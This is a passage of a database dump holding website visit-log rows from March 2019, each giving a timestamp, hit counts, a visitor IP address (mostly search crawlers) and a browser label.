2243380,1,1,0,0,'46.229.168.136','other'),(397674,1552243419,1,1,0,0,'40.77.167.13','other'),(397675,1552243761,1,1,0,0,'46.229.168.142','other'),(397676,1552243913,1,1,0,0,'54.36.149.79','other'),(397677,1552244104,1,1,0,0,'54.36.148.114','other'),(397678,1552244273,1,1,0,0,'54.36.150.179','other'),(397679,1552244489,1,1,0,0,'54.36.148.119','other'),(397680,1552244601,1,1,0,0,'46.229.168.150','other'),(397681,1552244736,1,1,0,0,'66.249.64.222','chrome'),(397682,1552244767,1,1,0,0,'54.36.150.139','other'),(397683,1552244911,1,1,0,0,'66.249.64.220','chrome'),(397684,1552245196,1,1,0,0,'54.36.148.192','other'),(397685,1552245369,1,1,0,0,'54.36.149.69','other'),(397686,1552246120,1,1,0,0,'54.36.149.81','other'),(397687,1552246309,1,1,0,0,'66.249.64.60','chrome'),(397688,1552246431,1,1,0,0,'54.36.148.66','other'),(397689,1552246462,1,1,0,0,'54.36.150.133','other'),(397690,1552246665,1,1,0,0,'207.46.13.88','other'),(397691,1552246777,1,1,0,0,'46.229.168.143','other'),(397692,1552246802,1,1,0,0,'207.46.13.122','other'),(397693,1552247205,1,1,0,0,'5.83.17.180','chrome'),(397694,1552247319,2,2,0,0,'5.45.207.19','other'),(397695,1552247407,1,1,0,0,'54.36.149.65','other'),(397696,1552247477,1,1,0,0,'91.196.178.75','firefox'),(397697,1552247668,1,1,0,0,'54.36.149.28','other'),(397698,1552247813,1,1,0,0,'5.45.207.79','other'),(397699,1552247893,1,1,0,0,'37.9.113.20','other'),(397700,1552247971,1,1,0,0,'37.115.186.35','chrome'),(397701,1552247975,2,2,0,0,'8.29.198.27','other'),(397702,1552248146,2,2,0,0,'178.154.244.11','other'),(397703,1552248345,2,2,0,0,'5.45.207.19','other'),(397704,1552248597,1,1,0,0,'54.36.150.23','other'),(397705,1552249250,1,1,0,0,'5.45.207.19','other'),(397706,1552249272,1,1,0,0,'54.36.148.224','other'),(397707,1552249474,1,1,0,0,'54.36.150.6','other'),(397708,1552249512,1,1,0,0,'5.45.207.79','other'),(397709,1552249769,2,2,0,0,'141.8.142.103','other'),(397710,1552249914,2,2,0,0,'178.154.244.11','other'),(397711,1552249964,1,1,0,0,'207.46.13.88','other'),(397712,1552250370,2,2,0,0,'5.45.207.19','other'),(397713,1552250408,1,1,0,0,'46.229.168.133','other'),(397714,1552250480,1,1,0,0,'95.108.213.4','other'),(397715,1552250724,1,1,0,0,'54.36.148.147','other'),(397716,1552250813,1,1,0,0,'54.36.148.167','other'),(397717,1552250924,1,1,0,0,'46.229.168.130','other'),(397718,1552251121,2,2,0,0,'5.45.207.79','other'),(397719,1552251165,1,1,0,0,'46.229.168.140','other'),(397720,1552251667,1,1,0,0,'66.249.64.222','chrome'),(397721,1552251750,1,1,0,0,'54.36.148.178','other'),(397722,1552251770,1,1,0,0,'46.229.168.151','other'),(397723,1552251774,1,1,0,0,'46.229.168.150','other'),(397724,1552251980,2,2,0,0,'5.45.207.19','other'),(397725,1552252308,1,1,0,0,'54.36.150.55','other'),(397726,1552253231,1,1,0,0,'157.55.39.85','other'),(397727,1552253342,1,1,0,0,'54.36.149.10','other'),(397728,1552254193,1,1,0,0,'157.55.39.254','other'),(397729,1552254631,2,2,0,0,'178.154.244.11','other'),(397730,1552254736,1,1,0,0,'66.249.64.220','chrome'),(397731,1552254893,1,1,0,0,'176.9.9.94','other'),(397732,1552255034,2,2,0,0,'66.249.64.222','chrome'),(397733,1552255171,1,1,0,0,'157.55.39.57','other'),(397734,1552255193,1,1,0,0,'54.36.149.64','other'),(397735,1552255950,1,1,0,0,'46.229.168.142','other'),(397736,1552255977,1,1,0,0,'54.36.149.6','other'),(397737,1552255989,1,1,0,0,'54.36.150.140','other'),(397738,1552256006,1,1,0,0,'66.249.64.58','chrome'),(397739,1552256532,1,1,0,0,'54.36.148.198','other'),(397740,1552257087,1,1,0,0,'95.108.213.4','other'),(397741,1552257112,1,1,0,0,'54.36.148.180','other'),(397742,1552257182,1,1,0,0,'54.36.149.107','other'),(397743,1552257320,1,1,0,0,'141.8.142.103','other'),(397744,1552257388,1,1,0,0,'207.46.13.122','other'),(397745,1552258515,1,1,0,0,'207.46.13.122','other'),(397746,1552258838,1,1,0,0,'8.29.198.25','other'),(397747,1552258944,1,1,0,0,'8.29.198.26','other'),(397748,1552259210,1,1,0,0,'66.249.64.220','chrome'),(397749,1552259429,1,1,0,0,'54.36.148.105','other'),(397750,1552259877,1,1,0,0,'157.55.39.254','other'),(397751,1552260103,1,1,0,0,'5.45.207.79','other'),(397752,1552260178,1,1,0,0,'66.249.64.62','chrome'),(397753,1552261264,1,1,0,0,'54.36.150.96','other'),(397754,1552261572,1,1,0,0,'178.154.171.24','other'),(397755,1552261575,1,1,0,0,'87.250.224.65','other'),(397756,1552261734,1,1,0,0,'54.36.148.160','other'),(397757,1552261782,1,1,0,0,'46.229.168.134','other'),(397758,1552261938,1,1,0,0,'66.249.64.58','chrome'),(397759,1552261960,1,1,0,0,'66.249.64.60','chrome'),(397760,1552262192,1,1,0,0,'157.55.39.254','other'),(397761,1552262246,1,1,0,0,'157.55.39.57','other'),(397762,1552262625,1,1,0,0,'46.229.168.145','other'),(397763,1552262687,1,1,0,0,'157.55.39.89','other'),(397764,1552263082,1,1,0,0,'180.76.15.5','other'),(397765,1552263340,1,1,0,0,'46.229.168.153','other'),(397766,1552263691,1,1,0,0,'54.36.150.34','other'),(397767,1552264058,1,1,0,0,'54.36.150.132','other'),(397768,1552264100,1,1,0,0,'46.229.168.133','other'),(397769,1552264195,1,1,0,0,'66.249.64.60','chrome'),(397770,1552264234,1,1,0,0,'46.229.168.151','other'),(397771,1552264332,1,1,0,0,'54.36.150.187','other'),(397772,1552264406,1,1,0,0,'54.36.148.178','other'),(397773,1552264619,1,1,0,0,'87.250.224.47','other'),(397774,1552264623,1,1,0,0,'87.250.224.65','other'),(397775,1552265302,23,23,0,0,'173.249.11.58','other'),(397776,1552265366,1,1,0,0,'109.201.154.198','other'),(397777,1552265719,1,1,0,0,'87.250.224.65','other'),(397778,1552265801,3,3,0,0,'178.154.244.11','other'),(397779,1552265829,3,3,0,0,'5.45.207.19','other'),(397780,1552265844,1,1,0,0,'157.55.39.254','other'),(397781,1552265860,1,1,0,0,'141.8.142.103','other'),(397782,1552266026,3,3,0,0,'95.108.213.4','other'),(397783,1552266039,1,1,0,0,'54.36.149.84','other'),(397784,1552266082,1,1,0,0,'54.36.148.29','other'),(397785,1552266222,18,18,0,0,'173.249.11.58','other'),(397786,1552266318,1,1,0,0,'54.36.149.25','other'),(397787,1552266421,1,1,0,0,'52.38.40.129','other'),(397788,1552266699,1,1,0,0,'157.55.39.57','other'),(397789,1552266836,1,1,0,0,'87.250.224.81','other'),(397790,1552266994,1,1,0,0,'54.36.150.55','other'),(397791,1552267034,1,1,0,0,'54.36.148.145','other'),(397792,1552267129,4,4,0,0,'5.45.207.79','other'),(397793,1552267153,1,1,0,0,'66.249.64.62','chrome'),(397794,1552267170,10,10,0,0,'173.249.11.58','other'),(397795,1552267449,1,1,0,0,'5.45.207.19','other'),(397796,1552268138,1,1,0,0,'54.36.150.25','other'),(397797,1552268140,1,1,0,0,'46.229.168.135','other'),(397798,1552268164,1,1,0,0,'40.77.167.33','other'),(397799,1552268322,1,1,0,0,'46.229.168.150','other'),(397800,1552268542,1,1,0,0,'207.46.13.122','other'),(397801,1552268590,2,2,0,0,'216.244.66.241','other'),(397802,1552268927,1,1,0,0,'46.229.168.130','other'),(397803,1552268944,1,1,0,0,'180.76.15.32','other'),(397804,1552269310,1,1,0,0,'5.45.207.79','other'),(397805,1552269447,2,2,0,0,'173.249.11.58','other'),(397806,1552269679,1,1,0,0,'8.29.198.27','other'),(397807,1552269765,1,1,0,0,'54.36.148.40','other'),(397808,1552269784,1,1,0,0,'8.29.198.26','other'),(397809,1552269806,1,1,0,0,'54.36.150.128','other'),(397810,1552269844,1,1,0,0,'54.36.150.187','other'),(397811,1552269949,1,1,0,0,'54.36.148.46','other'),(397812,1552270096,1,1,0,0,'54.36.150.90','other'),(397813,1552270106,1,1,0,0,'54.36.149.90','other'),(397814,1552270107,2,2,0,0,'54.244.207.4','chrome'),(397815,1552270573,1,1,0,0,'54.36.148.47','other'),(397816,1552270785,1,1,0,0,'5.45.207.79','other'),(397817,1552270787,1,1,0,0,'54.36.150.66','other'),(397818,1552270800,1,1,0,0,'54.36.148.77','other'),(397819,1552270804,1,1,0,0,'46.229.168.152','other'),(397820,1552270813,1,1,0,0,'54.36.149.6','other'),(397821,1552271257,1,1,0,0,'66.249.64.62','chrome'),(397822,1552271645,1,1,0,0,'157.55.39.89','other'),(397823,1552271746,1,1,0,0,'123.126.113.124','other'),(397824,1552271859,1,1,0,0,'54.36.148.241','other'),(397825,1552272072,1,1,0,0,'66.249.64.58','chrome'),(397826,1552272109,1,1,0,0,'54.36.149.92','other'),(397827,1552272629,1,1,0,0,'46.229.168.152','other'),(397828,1552273092,1,1,0,0,'46.166.186.209','other'),(397829,1552273207,2,2,0,0,'5.45.207.19','other'),(397830,1552273251,1,1,0,0,'54.36.150.35','other'),(397831,1552273260,1,1,0,0,'95.108.213.4','other'),(397832,1552273386,1,1,0,0,'54.36.150.19','other'),(397833,1552273405,1,1,0,0,'54.36.149.61','other'),(397834,1552273420,1,1,0,0,'46.229.168.148','other'),(397835,1552274206,1,1,0,0,'54.36.148.217','other'),(397836,1552274304,1,1,0,0,'178.154.244.11','other'),(397837,1552274398,1,1,0,0,'66.249.64.218','chrome'),(397838,1552274500,1,1,0,0,'216.244.66.241','other'),(397839,1552274670,1,1,0,0,'207.46.13.88','other'),(397840,1552274866,1,1,0,0,'54.36.148.209','other'),(397841,1552274912,1,1,0,0,'66.249.64.222','chrome'),(397842,1552274926,1,1,0,0,'66.249.64.220','chrome'),(397843,1552274987,1,1,0,0,'54.36.149.75','other'),(397844,1552275005,1,1,0,0,'54.36.148.61','other'),(397845,1552275302,1,1,0,0,'66.249.64.62','chrome'),(397846,1552275545,1,1,0,0,'46.229.168.141','other'),(397847,1552275555,1,1,0,0,'54.36.150.64','other'),(397848,1552275872,1,1,0,0,'66.249.64.222','chrome'),(397849,1552275934,1,1,0,0,'157.55.39.89','other'),(397850,1552275964,1,1,0,0,'66.249.64.218','chrome'),(397851,1552276388,1,1,0,0,'54.36.149.87','other'),(397852,1552276405,1,1,0,0,'54.36.149.22','other'),(397853,1552276685,1,1,0,0,'93.62.205.66','chrome'),(397854,1552276825,1,1,0,0,'216.244.66.241','other'),(397855,1552277824,1,1,0,0,'66.249.64.222','chrome'),(397856,1552277827,1,1,0,0,'207.46.13.122','other'),(397857,1552278505,1,1,0,0,'46.229.168.130','other'),(397858,1552278597,1,1,0,0,'54.36.148.31','other'),(397859,1552279181,1,1,0,0,'54.36.148.252','other'),(397860,1552279348,1,1,0,0,'66.249.64.222','chrome'),(397861,1552279444,1,1,0,0,'54.36.148.197','other'),(397862,1552279572,2,2,0,0,'216.244.66.241','other'),(397863,1552279860,1,1,0,0,'66.249.64.218','chrome'),(397864,1552279999,1,1,0,0,'40.77.167.78','other'),(397865,1552280524,1,1,0,0,'8.29.198.27','other'),(397866,1552280628,1,1,0,0,'8.29.198.26','other'),(397867,1552280698,1,1,0,0,'54.36.150.150','other'),(397868,1552280773,1,1,0,0,'54.36.150.83','other'),(397869,1552281149,1,1,0,0,'46.229.168.145','other'),(397870,1552281355,1,1,0,0,'54.36.149.28','other'),(397871,1552281463,2,2,0,0,'66.249.64.218','chrome'),(397872,1552281720,1,1,0,0,'66.249.64.62','chrome'),(397873,1552282183,1,1,0,0,'216.244.66.241','other'),(397874,1552282534,1,1,0,0,'46.229.168.151','other'),(397875,1552282602,1,1,0,0,'46.229.168.153','other'),(397876,1552282723,2,2,0,0,'66.249.64.222','chrome'),(397877,1552282783,1,1,0,0,'37.9.113.103','other'),(397878,1552282832,1,1,0,0,'40.77.167.78','other'),(397879,1552282852,1,1,0,0,'66.249.64.60','chrome'),(397880,1552282880,1,1,0,0,'46.229.168.147','other'),(397881,1552282944,2,2,0,0,'66.249.64.218','chrome'),(397882,1552282960,1,1,0,0,'178.154.200.48','other'),(397883,1552283041,1,1,0,0,'54.36.150.26','other'),(397884,1552283056,1,1,0,0,'87.250.224.47','other'),(397885,1552283097,1,1,0,0,'178.154.171.17','other'),(397886,1552283116,1,1,0,0,'54.36.148.176','other'),(397887,1552283186,1,1,0,0,'5.45.207.19','other'),(397888,1552283229,1,1,0,0,'178.154.244.11','other'),(397889,1552283556,1,1,0,0,'95.108.181.75','other'),(397890,1552283689,1,1,0,0,'95.108.213.4','other'),(397891,1552283746,1,1,0,0,'141.8.183.23','other'),(397892,1552283884,2,2,0,0,'66.249.64.220','chrome'),(397893,1552284123,1,1,0,0,'54.36.148.36','other'),(397894,1552284143,2,2,0,0,'157.55.39.57','other'),(397895,1552284336,2,2,0,0,'178.154.244.11','other'),(397896,1552284514,3,3,0,0,'5.45.207.19','other'),(397897,1552284792,1,1,0,0,'54.36.150.83','other'),(397898,1552284811,1,1,0,0,'95.108.213.4','other'),(397899,1552284991,1,1,0,0,'46.229.168.147','other'),(397900,1552285019,1,1,0,0,'54.36.149.13','other'),(397901,1552285072,1,1,0,0,'54.36.150.53','other'),(397902,1552285075,1,1,0,0,'54.36.150.82','other'),(397903,1552285194,1,1,0,0,'54.36.150.132','other'),(397904,1552285263,1,1,0,0,'54.36.148.68','other'),(397905,1552285330,1,1,0,0,'178.154.244.11','other'),(397906,1552285722,1,1,0,0,'185.220.101.34','other'),(397907,1552285994,1,1,0,0,'54.36.148.151','other'),(397908,1552286063,1,1,0,0,'66.249.64.58','chrome'),(397909,1552286453,1,1,0,0,'91.196.177.46','firefox'),(397910,1552286801,1,1,0,0,'54.36.150.53','other'),(397911,1552286864,3,3,0,0,'5.45.207.79','other'),(397912,1552286998,1,1,0,0,'40.77.167.78','other'),(397913,1552287188,1,1,0,0,'46.229.168.149','other'),(397914,1552287217,1,1,0,0,'66.249.64.218','chrome'),(397915,1552287541,1,1,0,0,'87.250.224.47','other'),(397916,1552287586,1,1,0,0,'141.8.142.103','other'),(397917,1552287780,1,1,0,0,'54.36.149.88','other'),(397918,1552287994,1,1,0,0,'5.45.207.19','other'),(397919,1552288178,2,2,0,0,'66.249.64.220','chrome'),(397920,1552288313,1,1,0,0,'66.249.64.218','chrome'),(397921,1552289023,1,1,0,0,'54.36.150.84','other'),(397922,1552289709,1,1,0,0,'66.249.64.222','chrome'),(397923,1552290039,1,1,0,0,'54.36.148.200','other'),(397924,1552290232,1,1,0,0,'91.196.178.89','chrome'),(397925,1552290284,1,1,0,0,'54.36.150.121','other'),(397926,1552290453,1,1,0,0,'40.77.167.78','other'),(397927,1552290522,1,1,0,0,'37.204.17.67','msie'),(397928,1552290612,1,1,0,0,'54.36.149.66','other'),(397929,1552290697,1,1,0,0,'46.229.168.135','other'),(397930,1552291263,1,1,0,0,'46.219.222.4','chrome'),(397931,1552291318,1,1,0,0,'66.249.64.222','chrome'),(397932,1552291365,1,1,0,0,'8.29.198.25','other'),(397933,1552291458,1,1,0,0,'8.29.198.26','other'),(397934,1552291888,1,1,0,0,'54.36.150.142','other'),(397935,1552292034,1,1,0,0,'54.36.150.58','other'),(397936,1552292685,1,1,0,0,'3.91.2.189','other'),(397937,1552292948,1,1,0,0,'130.180.216.75','chrome'),(397938,1552293002,1,1,0,0,'216.244.66.241','other'),(397939,1552293204,1,1,0,0,'54.36.150.47','other'),(397940,1552293376,1,1,0,0,'91.196.178.94','chrome'),(397941,1552293393,1,1,0,0,'54.36.150.143','other'),(397942,1552293540,1,1,0,0,'66.249.64.218','chrome'),(397943,1552293725,1,1,0,0,'66.249.64.220','chrome'),(397944,1552293820,1,1,0,0,'54.36.149.101','other'),(397945,1552293827,1,1,0,0,'54.36.150.86','other'),(397946,1552294188,1,1,0,0,'207.46.13.214','other'),(397947,1552294279,1,1,0,0,'54.36.149.4','other'),(397948,1552294390,1,1,0,0,'195.189.249.165','firefox'),(397949,1552294428,1,1,0,0,'95.163.255.46','other'),(397950,1552294488,1,1,0,0,'54.36.148.67','other'),(397951,1552294490,1,1,0,0,'54.36.150.125','other'),(397952,1552294555,1,1,0,0,'54.36.149.31','other'),(397953,1552294723,1,1,0,0,'46.229.168.140','other'),(397954,1552294773,1,1,0,0,'54.36.149.65','other'),(397955,1552294866,1,1,0,0,'46.229.168.148','other'),(397956,1552295092,1,1,0,0,'40.77.167.78','other'),(397957,1552295158,1,1,0,0,'157.55.39.57','other'),(397958,1552295184,1,1,0,0,'54.36.150.80','other'),(397959,1552295299,1,1,0,0,'66.249.64.62','chrome'),(397960,1552295966,1,0,1,0,'66.249.64.218',''),(397961,1552296097,1,1,0,0,'54.36.148.236','other'),(397962,1552296136,1,1,0,0,'46.229.168.150','other'),(397963,1552296344,1,1,0,0,'157.55.39.204','other'),(397964,1552296377,1,1,0,0,'54.36.150.181','other'),(397965,1552296470,1,1,0,0,'54.36.149.66','other'),(397966,1552296566,2,2,0,0,'66.249.64.218','chrome'),(397967,1552296670,1,1,0,0,'54.36.150.179','other'),(397968,1552296759,1,1,0,0,'66.249.64.62','chrome'),(397969,1552297136,1,1,0,0,'66.249.64.220','chrome'),(397970,1552297418,1,1,0,0,'54.36.149.42','other'),(397971,1552297458,1,1,0,0,'54.36.148.84','other'),(397972,1552297604,1,1,0,0,'40.77.190.21','other'),(397973,1552297647,1,1,0,0,'54.36.148.12','other'),(397974,1552297687,1,1,0,0,'54.36.150.112','other'),(397975,1552297811,1,1,0,0,'94.100.221.234','chrome'),(397976,1552298055,4,4,0,0,'66.249.64.220','chrome'),(397977,1552298056,2,2,0,0,'216.244.66.241','other'),(397978,1552298141,1,1,0,0,'178.92.118.124','chrome'),(397979,1552298583,1,1,0,0,'54.36.150.128','other'),(397980,1552298667,1,1,0,0,'54.36.148.38','other'),(397981,1552298919,1,1,0,0,'54.36.150.114','other'),(397982,1552299149,1,1,0,0,'157.55.39.57','other'),(397983,1552299214,1,0,1,0,'51.68.152.26',''),(397984,1552299547,1,1,0,0,'54.36.148.213','other'),(397985,1552299799,1,1,0,0,'207.46.13.97','other'),(397986,1552300006,1,1,0,0,'54.36.150.16','other'),(397987,1552300062,1,1,0,0,'54.36.150.93','other'),(397988,1552300072,1,1,0,0,'46.229.168.137','other'),(397989,1552300262,1,1,0,0,'66.249.64.222','chrome'),(397990,1552300333,1,1,0,0,'54.36.148.246','other'),(397991,1552301416,1,1,0,0,'66.249.64.222','chrome'),(397992,1552301620,1,1,0,0,'91.196.178.73','firefox'),(397993,1552301655,1,1,0,0,'54.36.148.192','other'),(397994,1552301734,1,1,0,0,'54.36.149.42','other'),(397995,1552302007,1,1,0,0,'91.196.178.82','chrome'),(397996,1552302226,2,2,0,0,'8.29.198.25','other'),(397997,1552302350,1,1,0,0,'54.36.149.53','other'),(397998,1552303247,1,1,0,0,'54.36.148.37','other'),(397999,1552303397,1,1,0,0,'91.209.11.236','other'),(398000,1552303557,1,1,0,0,'157.55.39.108','other'),(398001,1552304072,1,1,0,0,'66.249.64.62','chrome'),(398002,1552304125,1,1,0,0,'54.36.148.134','other'),(398003,1552304364,1,1,0,0,'66.249.64.60','chrome'),(398004,1552304946,1,1,0,0,'87.250.224.65','other'),(398005,1552304950,1,1,0,0,'5.45.207.79','other'),(398006,1552304982,1,1,0,0,'46.229.168.151','other'),(398007,1552304990,1,1,0,0,'54.36.148.24','other'),(398008,1552305032,1,1,0,0,'5.53.113.95','chrome'),(398009,1552305051,1,1,0,0,'46.229.168.133','other'),(398010,1552305057,1,1,0,0,'54.36.150.94','other'),(398011,1552305206,1,1,0,0,'66.249.64.218','chrome'),(398012,1552305226,1,1,0,0,'54.36.148.163','other'),(398013,1552305252,1,1,0,0,'157.55.39.108','other'),(398014,1552305257,1,1,0,0,'178.154.244.11','other'),(398015,1552305296,3,3,0,0,'5.45.207.19','other'),(398016,1552305354,1,1,0,0,'141.8.142.103','other'),(398017,1552305440,1,1,0,0,'178.154.171.88','other'),(398018,1552305734,1,1,0,0,'216.244.66.241','other'),(398019,1552305837,1,1,0,0,'77.111.244.93','chrome'),(398020,1552305863,1,1,0,0,'54.36.148.207','other'),(398021,1552306039,1,1,0,0,'91.196.177.46','chrome'),(398022,1552306058,1,1,0,0,'207.46.13.97','other'),(398023,1552306207,1,1,0,0,'157.55.39.108','other'),(398024,1552306325,1,1,0,0,'5.45.207.79','other'),(398025,1552306426,1,1,0,0,'54.36.148.78','other'),(398026,1552306465,1,1,0,0,'54.36.148.107','other'),(398027,1552306684,1,1,0,0,'54.36.150.36','other'),(398028,1552306794,1,1,0,0,'54.36.150.113','other'),(398029,1552306838,3,3,0,0,'178.154.244.11','other'),(398030,1552306946,1,1,0,0,'91.196.178.167','chrome'),(398031,1552306965,1,1,0,0,'54.36.148.87','other'),(398032,1552307052,1,1,0,0,'5.45.207.19','other'),(398033,1552307101,1,1,0,0,'54.36.148.29','other'),(398034,1552307328,1,1,0,0,'213.180.203.9','other'),(398035,1552307380,1,1,0,0,'54.36.148.180','other'),(398036,1552307409,1,1,0,0,'5.45.207.79','other'),(398037,1552307454,1,1,0,0,'66.249.64.29','chrome'),(398038,1552307458,1,1,0,0,'54.36.148.210','other'),(398039,1552307472,1,1,0,0,'54.36.149.48','other'),(398040,1552307480,1,1,0,0,'130.180.216.75','chrome'),(398041,1552307488,1,1,0,0,'54.36.148.238','other'),(398042,1552307565,1,1,0,0,'37.55.174.198','chrome'),(398043,1552307569,1,1,0,0,'54.36.148.84','other'),(398044,1552308154,1,1,0,0,'178.92.153.73','firefox'),(398045,1552308197,1,1,0,0,'54.36.149.42','other'),(398046,1552308530,1,1,0,0,'54.36.149.73','other'),(398047,1552308579,3,3,0,0,'216.244.66.241','other'),(398048,1552308587,2,2,0,0,'66.249.64.30','chrome'),(398049,1552308772,2,2,0,0,'66.249.64.31','chrome'),(398050,1552308864,2,2,0,0,'157.55.39.108','other'),(398051,1552308900,1,1,0,0,'91.196.178.81','firefox'),(398052,1552308940,1,1,0,0,'54.36.148.167','other'),(398053,1552309051,1,1,0,0,'54.36.149.2','other'),(398054,1552309127,1,1,0,0,'46.229.168.141','other'),(398055,1552309252,1,1,0,0,'54.36.148.216','other'),(398056,1552309418,1,1,0,0,'91.196.178.90','chrome'),(398057,1552309883,1,1,0,0,'66.249.64.58','chrome'),(398058,1552309890,3,3,0,0,'66.249.64.31','chrome'),(398059,1552309921,1,1,0,0,'91.196.178.167','chrome'),(398060,1552309988,1,1,0,0,'54.36.148.210','other'),(398061,1552310216,1,1,0,0,'91.196.177.15','chrome'),(398062,1552310322,1,1,0,0,'178.154.244.11','other'),(398063,1552310399,1,1,0,0,'46.211.120.40','chrome'),(398064,1552310415,1,1,0,0,'141.8.142.103','other'),(398065,1552310553,1,1,0,0,'91.196.178.81','chrome'),(398066,1552310614,1,1,0,0,'91.196.159.227','other'),(398067,1552310656,1,1,0,0,'66.249.64.30','chrome'),(398068,1552310680,1,1,0,0,'54.36.148.87','other'),(398069,1552310738,1,1,0,0,'54.36.149.48','other'),(398070,1552310795,1,1,0,0,'40.77.167.182','other'),(398071,1552310808,1,1,0,0,'66.249.64.31','chrome'),(398072,1552310885,1,1,0,0,'91.196.178.45','chrome'),(398073,1552310904,1,1,0,0,'54.36.150.108','other'),(398074,1552311236,1,1,0,0,'66.249.64.62','chrome'),(398075,1552311460,1,1,0,0,'91.196.178.135','firefox'),(398076,1552311542,1,1,0,0,'91.196.177.15','chrome'),(398077,1552311751,1,1,0,0,'54.36.150.95','other'),(398078,1552312059,1,1,0,0,'54.36.150.176','other'),(398079,1552312105,1,1,0,0,'54.36.148.120','other'),(398080,1552312316,1,1,0,0,'5.45.207.79','other'),(398081,1552312325,2,2,0,0,'95.108.213.4','other'),(398082,1552312601,1,1,0,0,'130.180.216.75','chrome'),(398083,1552312620,1,1,0,0,'54.36.148.201','other'),(398084,1552312693,1,1,0,0,'66.249.64.60','chrome'),(398085,1552312814,1,1,0,0,'46.229.168.134','other'),(398086,1552313085,2,2,0,0,'8.29.198.25','other'),(398087,1552313236,2,2,0,0,'66.249.64.31','chrome'),(398088,1552313551,4,4,0,0,'216.244.66.241','other'),(398089,1552313919,1,1,0,0,'91.196.178.134','chrome'),(398090,1552314361,1,1,0,0,'46.229.168.135','other'),(398091,1552314591,1,1,0,0,'54.36.149.25','other'),(398092,1552314939,2,2,0,0,'66.249.64.29','chrome'),(398093,1552315011,1,1,0,0,'180.76.15.16','other'),(398094,1552315013,1,1,0,0,'46.229.168.139','other'),(398095,1552315392,1,1,0,0,'178.154.244.11','other'),(398096,1552315724,1,1,0,0,'141.8.142.103','other'),(398097,1552315973,1,1,0,0,'46.229.168.151','other'),(398098,1552316185,1,1,0,0,'54.36.150.152','other'),(398099,1552316325,3,3,0,0,'91.196.178.28','chrome'),(398100,1552316357,1,1,0,0,'178.154.244.11','other'),(398101,1552316709,1,1,0,0,'54.36.149.36','other'),(398102,1552316788,1,1,0,0,'54.36.148.226','other'),(398103,1552316795,1,1,0,0,'54.36.150.56','other'),(398104,1552317103,1,1,0,0,'54.36.148.39','other'),(398105,1552317270,1,1,0,0,'54.36.150.187','other'),(398106,1552317276,1,1,0,0,'54.36.148.82','other'),(398107,1552317491,1,1,0,0,'207.46.13.243','other'),(398108,1552317650,2,2,0,0,'95.213.141.126','opera'),(398109,1552318124,1,1,0,0,'54.36.148.159','other'),(398110,1552318349,2,2,0,0,'66.249.64.31','chrome'),(398111,1552318362,1,1,0,0,'54.36.150.158','other'),(398112,1552318779,1,1,0,0,'46.229.168.133','other'),(398113,1552318893,2,2,0,0,'54.36.149.91','other'),(398114,1552319042,1,1,0,0,'54.36.148.195','other'),(398115,1552319068,1,1,0,0,'54.36.148.50','other'),(398116,1552319162,1,1,0,0,'46.229.168.137','other'),(398117,1552319326,1,1,0,0,'46.229.168.140','other'),(398118,1552319475,4,4,0,0,'66.249.64.30','chrome'),(398119,1552319740,1,1,0,0,'46.229.168.152','other'),(398120,1552319872,1,1,0,0,'54.36.149.79','other'),(398121,1552319966,1,1,0,0,'54.36.149.31','other'),(398122,1552320148,1,1,0,0,'157.55.39.112','other'),(398123,1552320640,1,1,0,0,'46.229.168.130','other'),(398124,1552320878,1,1,0,0,'46.229.168.136','other'),(398125,1552320993,1,1,0,0,'54.36.148.42','other'),(398126,1552321069,1,1,0,0,'54.36.150.71','other'),(398127,1552321669,1,1,0,0,'95.163.255.104','other'),(398128,1552322037,1,1,0,0,'54.36.150.106','other'),(398129,1552322303,1,1,0,0,'66.249.64.60','chrome'),(398130,1552322407,1,1,0,0,'92.112.125.252','chrome'),(398131,1552322751,1,1,0,0,'207.46.13.97','other'),(398132,1552322909,1,1,0,0,'54.36.148.57','other'),(398133,1552323044,1,1,0,0,'54.36.148.236','other'),(398134,1552323355,1,1,0,0,'66.249.64.31','chrome'),(398135,1552323711,1,1,0,0,'54.36.148.5','other'),(398136,1552323801,1,1,0,0,'54.36.150.162','other'),(398137,1552323957,2,2,0,0,'8.29.198.25','other'),(398138,1552324071,1,1,0,0,'180.76.15.147','other'),(398139,1552324114,1,1,0,0,'54.36.150.190','other'),(398140,1552324271,1,1,0,0,'207.46.13.114','other'),(398141,1552324395,1,1,0,0,'91.196.178.90','firefox'),(398142,1552324479,1,1,0,0,'54.36.149.95','other'),(398143,1552324652,1,1,0,0,'54.36.149.39','other'),(398144,1552324943,2,2,0,0,'66.249.64.31','chrome'),(398145,1552325330,1,1,0,0,'66.249.64.29','chrome'),(398146,1552325390,1,1,0,0,'54.36.148.192','other'),(398147,1552325418,3,3,0,0,'157.55.39.3','other'),(398148,1552325466,1,1,0,0,'54.36.148.99','other'),(398149,1552325598,2,2,0,0,'66.249.64.30','chrome'),(398150,1552325675,1,1,0,0,'54.36.150.129','other'),(398151,1552325748,1,1,0,0,'54.36.150.141','other'),(398152,1552325781,1,1,0,0,'54.36.150.183','other'),(398153,1552325822,1,1,0,0,'54.36.148.171','other'),(398154,1552325827,1,1,0,0,'54.36.148.7','other'),(398155,1552325841,1,1,0,0,'54.36.148.117','other'),(398156,1552326010,1,1,0,0,'46.175.136.178','chrome'),(398157,1552326044,1,1,0,0,'46.211.111.251','chrome'),(398158,1552326283,1,1,0,0,'141.8.142.103','other'),(398159,1552326341,1,1,0,0,'54.36.148.210','other'),(398160,1552326682,1,1,0,0,'207.46.13.114','other'),(398161,1552326729,1,1,0,0,'178.137.17.200','chrome'),(398162,1552326762,2,2,0,0,'46.229.168.130','other'),(398163,1552327207,1,1,0,0,'54.36.150.185','other'),(398164,1552327244,2,2,0,0,'66.249.64.30','chrome'),(398165,1552327329,1,1,0,0,'207.46.13.243','other'),(398166,1552327363,1,1,0,0,'46.229.168.144','other'),(398167,1552327382,1,1,0,0,'5.45.207.79','other'),(398168,1552327550,1,1,0,0,'216.244.66.241','other'),(398169,1552327607,1,1,0,0,'66.249.64.29','chrome'),(398170,1552327671,1,1,0,0,'66.249.64.60','chrome'),(398171,1552327870,1,1,0,0,'54.36.148.168','other'),(398172,1552328230,1,1,0,0,'54.36.149.20','other'),(398173,1552328499,1,1,0,0,'54.36.150.97','other'),(398174,1552328540,3,3,0,0,'66.249.64.29','chrome'),(398175,1552328788,1,1,0,0,'180.76.15.5','other'),(398176,1552329007,1,1,0,0,'54.36.150.2','other'),(398177,1552329053,1,1,0,0,'207.189.30.116','chrome'),(398178,1552329755,1,1,0,0,'54.36.148.45','other'),(398179,1552329933,1,1,0,0,'54.36.149.96','other'),(398180,1552329964,2,2,0,0,'207.46.13.243','other'),(398181,1552330213,1,1,0,0,'216.244.66.241','other'),(398182,1552330295,1,1,0,0,'54.36.150.